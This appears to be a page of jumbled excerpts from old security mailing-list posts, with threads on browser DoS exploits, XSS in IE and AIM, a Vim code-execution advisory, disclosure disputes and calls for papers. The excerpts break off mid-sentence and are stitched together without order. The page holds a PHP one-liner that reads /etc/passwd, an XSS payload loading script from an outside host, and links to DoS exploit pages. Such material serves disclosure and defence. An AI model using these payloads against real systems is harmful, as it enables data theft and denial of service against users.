| New User, Welcome! Login |
Next Page >>
works
php -r 'include("/etc/passwd/");'
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
As you can see the file is succesfully included (it works with every
single filesystem function of PHP that makes use of _php_stream_fopen()
and similiar functions).
This is also part of the vector discovered by barbarianbob, while he
uses it for different purposes from what I initially thought.
of ``eval'' in some other languages. Throughout Vim, arguments passed to
``execute'' are not sanitized properly. This can lead to arbitrary code
execution. We will show several exploits which execute arbitrary code upon
opening a crafted file with the ex(1), vim(1), or view(1) commands. Only in
few cases will we explore the possibility of remote exploitation. We will
present fixes/workarounds to some of the vulnerabilities.
The archive with code that is a part of this advisory can be found at
``http://www.rdancer.org/vulnerablevim.tar.bz2''.
Hello Thierry!
> Your saying above that this attack works if "Initialise and script
> ActiveX control not marked as safe" is ENABLED.
This Saved XSS hole works even with this option disabled (i.e. with default
settings). But when we want to use ActiveX in our code (e.g. for Code
Execution attack), than such problem occurs. It's bug in IE (when there is
preceding comment tag), which I found when researching possibility of making
CE via XSS in IE. So I found the workaround for this bug - to set up this
DoS:
http://websecurity.com.ua/uploads/2010/Chrome%20&%20Opera%20DoS%20Exploit.html
This exploit for chrome protocol works in Google Chrome 1.0.154.48 and Opera
9.52.
In Chrome occurs blocking of the browser. And in Opera occurs resources
consumption (CPU and memory).
-:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)
Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
and Opera (http://websecurity.com.ua/3194/). Or like DoS vulnerability in
Internet Explorer 7 (http://websecurity.com.ua/2872/), which is similar to
DoS vulnerabilities in Firefox, Opera and Chrome
(http://websecurity.com.ua/2456/), all of them are printing DoS attacks.
> This will ONLY work if FireFox does NOT know which program to use.
It's interesting, because as I understand from your first information that
if works in Firefox (via Chrome) and from your previous text ("that FireFox
knows exists on the target operating system"), it must work if Firefox does
KNOW about which program to use. But in your case DoS effect is better when
M> available on English (http://securityvulns.ru/Udocument911.html).
Refering to the above, could you briefly explain :
==============
This attack works in Internet Explorer when option “Initialize and
script ActiveX control not marked as safe” (for Local intranet) is turned
on (Enabled or Prompt). It's such bug in hole of Microsoft :-) and it's
method of bypassing of the bug. This setting is needed only during attack
via this XSS, when JS code placed on the same line, where there is a
comment. Because if it's on other line (i.e. without preceding comment),
tries to call a function (at +2Ch on IE 6, +30h on IE 7) from the
vtable. This makes exploitability completely dependent on the
system's version of MSHTML.DLL, and all but rules out successful
exploitation in 64-bit Internet Explorer.
The mitigation works by replacing one function pointer in the vtable
with a pointer for which the low 2 bytes are 0xCCCC, but at which the
code is functionally equivalent. Legitimate virtual function calls
work will as usual, while exploitation attempts will arrive at EIP =
0xCCCCxxxx (not exploitable) rather than 0xyyyyxxxx (exploitable for
some yyyy).
> attacks. But mostly browser developers ignore to fix these issues.
>
> But in this case it's not only attack on browsers, but on the whole
> user's
> computer - because it's blocking of whole computer and full resource
> consumption. Which is working in many browsers, including their last
> versions. So browser developers with their neglect to this problem make
> possible attacks on the whole users' systems. It was one of leitmotifs
> of my
> advisory.
>
Dangers of DoS attacks on browsers and Dangers of resources consumption DoS
attacks. But mostly browser developers ignore to fix these issues.
But in this case it's not only attack on browsers, but on the whole user's
computer - because it's blocking of whole computer and full resource
consumption. Which is working in many browsers, including their last
versions. So browser developers with their neglect to this problem make
possible attacks on the whole users' systems. It was one of leitmotifs of my
advisory.
> can I respectfully ask that you give vendors time to respond before
5. *Non-vulnerable packages*
. Microsoft virtualization products that are based on Hyper-V technology.
6. *Vendor Information, Solutions and Workarounds*
This issue was reported to Microsoft in August 2009. The vendor has
acknowledged the report and after extensive analysis indicated that it
plans to solve the problem in future updates to the associated products.
maybe I am making a huge mistake for responding to your message, but
let see. this is what I think about security in depth in a bit more
detail.
let say that we have a wireless network which is guarded by "security
in depth" network administrators. the first thing they will do is to
secure the actual network by some massive segmentation exercises...
then the connection with enhanced privacy/encryption schemes (WPA2).
They will put more layers on the top of that. For example, the users
need to authenticate with client-side certificates. Now the network
Hi,
Just wanted to add a quick update on affected systems since I forgot to mention webservers along with wordpress versions in my advisory.
Some people are wondering why the vulnerability doesn't work on their system.
I'm pretty sure that the exploit won't work on web servers other than Apache (as they probably won't process extensions other than the last one). So not apache based servers are probably safe here.
Whether it will work on your Apache server or not depends on your mod_php configuration.
The exploit won't work on servers where PHP scripts handling has been configured as follows:
<FilesMatch \.php$>
SetHandler application/x-httpd-php
> So you tell you discovered this issue as
> well and you informed vendors, but the only vendor who really has RA
> support so far is Cisco, and they did not know.
We had worked on this thing for a while. IIRC, I talked with a few guys
about this in November 2010 or so (including, IIRC, some guys involved
in NDPMon)-- For instance, I posted on the ipv6ops mailing-list (in
November/December 2010) a few comments noting that RA-Guard could be evaded.
(And, FWIW, vendors have been sitting on a number of other ND issues
You really should stop talking about exploits against Powerpoint etc.
As long as I can make an .exe that visually looks pixel for pixel like
a .ppt, the security model you imagine (that the desktop can
differentiate between code execution and document editing) doesn't
exist. This work is better, if incomplete.
On Thu, Jun 2, 2011 at 9:32 AM, Mitja Kolsek <mitja.kolsek@acros.si> wrote:
>
> Thor, the "Online Proof of Concept" section of the blog post points you to a *remote*
> exploit (without any warning) but let me repeat the link here:
don't stop loading DLLs from arbitrary folders. So double-clicking on
a .ppt lookalike executable would be blocked, but a malicious DLL next
to a real .ppt file wouldn't be. But again, no idea as to how many/few
computers use this protection.
> This work is better, if incomplete.
Security research is never complete, so we settle for constant improvement.
Cheers,
Mitja
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 12, 2008
I. BACKGROUND
Microsoft Works is a word processor created by Microsoft in the 1980s.
Microsoft Office, a widely use productivity suite, is distributed with
converters for various versions of the Works file format.
II. DESCRIPTION
I would be happy to wait for patches of browser vendors, but as already
told you in details, it's not possible due to behavior of browser vendors.
All they mostly ignore such holes, all they don't count DoS as
vulnerabilities, they called them "stability issues" and so don't attend to
them seriously (and not fixing or fixing slowly). I don't respect such
statement as "stability issues" for DoS holes, and during 2008-2010 I worked
hard to change vendors' mind on this issue, but they still ignore it.
Also, as I already told you, they never told if they fixed or not such holes
(especially taking into account that they almost always ignore my letters
with such holes or, as Opera did few times, answering with "it's stability
Protect to 2 for the best protection against SYN attacks. This value
adds additional delays to connection indications, and TCP connection
requests quickly timeout when a SYN attack is in progress. This
parameter is the recommended setting.
NOTE: The following socket options no longer work on any socket when you
set the SynAttackProtect value to 2: Scalable windows
-----
IIRC? This is called the "Silly Window Syndrome", & this is a way, in
new technology also developed by AOL and available for the public in the
form of a "light IM client".
A vulnerability was discovered in these three popular versions of AOL
Instant Messaging software, AIM 6.1 (and 6.2 beta), AIM Pro and AIM Lite,
which expose workstations running the IM clients and their users to
several immediate high-risk attack vectors. To support rendering of HTML
content, the vulnerable IM clients use an embedded Internet Explorer
server control. Unfortunately they do not properly sanitize the
potentially malicious input content to be rendered and, as a result, an
attacker might provide malicious HTML content as part of an IM message to
----------------------------------------------------------------------------------------------------------------
ACSAC 2009: Deadline extended (panels June 10; papers, case studies, workshops, tutorials: June 8)
----------------------------------------------------------------------------------------------------------------
25th Annual Computer Security Applications Conference (ACSAC)
December 7-11, 2009
Honolulu, Hawaii
CALL FOR PARTICIPATION: SUBMISSION DEADLINE EXTENDED
Our website is now open for submissions: http://www.acsac.org
"..I am not planning to support my argument in any way.."
That's a shame.
If you can prove your hypothesis, it lends credibility to your claims.
A refusal to do so only weakens your position.
As others have pointed out, your attack only works if security in depth has been blatantly, intentionally ignored.
I'll grant that it's an interesting methodology, but it assumes too much and ultimately fails to prove your claims.
You're absolutely correct; "Security in depth" is a process; no one has argued this.
What no one has stated is that security in depth has an endpoint.
Not only does it require proper analysis, planning and deployment, it's greatly weakened without constant monitoring and adjustment to meet new threats.
Don't worry about how bad guys will be placing of JS code or page with
iframes at web site for this attack - it'll be their own problem. And if
they want they will do it. And after they placed attacking code (JS or HTML)
on target-site, then it'll be already a problem of users of this site (which
will can not work with it) and admin of the site (which in addition to
problems with working with the site, also will left without visitors on his
site). There are always vulnerabilities on different sites which can be used
for this attack. And also e-mail vector mentioned by Vladimir can be used.
> Its called the "infinite loop".
Some last specifics (mostly reiterating what I said in my earlier posts) -
1. You can take this issue up with the content aggregators (CDN etc) and or
website programmers, this is not an issue to be addressed by the webbrowsers
because the solution of it remains imperfect in theory (one of my posts have
a 'workaround'...maybe a 'good to have' feature which WILL open up another
can of worms...).
2. Now the even vague non-scripted issue which you insist upon - If you are
trying to say that a 1000 lines of <iframe src='nntp:something'/> (which is
executed sequentially by any JVM as a fact) is an 'exploit' and 'security
vulnerability', isn't there a HUGE point missing?
And as I checked at 16.05.2010, to this vulnerability are vulnerable web
browsers Firefox 3.0.19 and Opera 9.52. And I created exploit for conducting
of DoS attack on Firefox.
Also I found possibility to open email client via iframe with mailto: URL.
Which works in browsers Firefox 3.0.19, IE6, IE8 and Chrome. And I created
exploit for conducting of attack on all browsers, which I called DoS via
email. This attack can be conducted as with using JS, as without it (via
creating of page with large quantity of iframes).
If attack via images at a page (which open email client) is only discomfort,
> DoS:
>
> http://websecurity.com.ua/uploads/2010/Firefox,%20IE,%20Chrome%20&%20Opera%20DoS%20Exploit2.html
>
>
> This exploit for news protocol works in Mozilla Firefox 3.0.19 (and
> besides
> previous versions, it must work in 3.5.x and 3.6.x), Internet Explorer 6
> (6.0.2900.2180), Internet Explorer 8 (8.0.7600.16385), Google Chrome
> 1.0.154.48 and Opera 9.52.
>
DoS:
http://websecurity.com.ua/uploads/2010/Firefox,%20IE,%20Chrome%20&%20Opera%20DoS%20Exploit2.html
This exploit for news protocol works in Mozilla Firefox 3.0.19 (and besides
previous versions, it must work in 3.5.x and 3.6.x), Internet Explorer 6
(6.0.2900.2180), Internet Explorer 8 (8.0.7600.16385), Google Chrome
1.0.154.48 and Opera 9.52.
In all mentioned browsers occurs blocking and overloading of the system from
Call For Papers -- BADGERS 2011
=============================================
The Program Committee for the first EuroSys Workshop on Building
Analysis Datasets and Gathering Experience Returns for Security (BADGERS)
invites you to submit your work.
Paper submissions are due January 31, 2011, 11:59 p.m. PST.
More information about the workshop can be found at:
Potential Security Impact: Local unqualified configuration change
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX running the Ignite-UX or the DynRootDisk (DRD) get_system_info command. This command can change system networking parameters without notification.
References: none
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running the Ignite-UX vC.7.0, vC.7.1, vC.7.2, vC.7.3 or the DynRootDisk (DRD) vA.1.0.16.417, vA.1.0.18.245, vA.1.1.0.344, vA.2.0.0.592 get_system_info command.
> conducting
> of DoS attack on Firefox.
>
> Also I found possibility to open email client via iframe with mailto:
> URL.
> Which works in browsers Firefox 3.0.19, IE6, IE8 and Chrome. And I
> created
> exploit for conducting of attack on all browsers, which I called DoS via
> email. This attack can be conducted as with using JS, as without it (via
> creating of page with large quantity of iframes).
>
Next Page>>
|
|
|
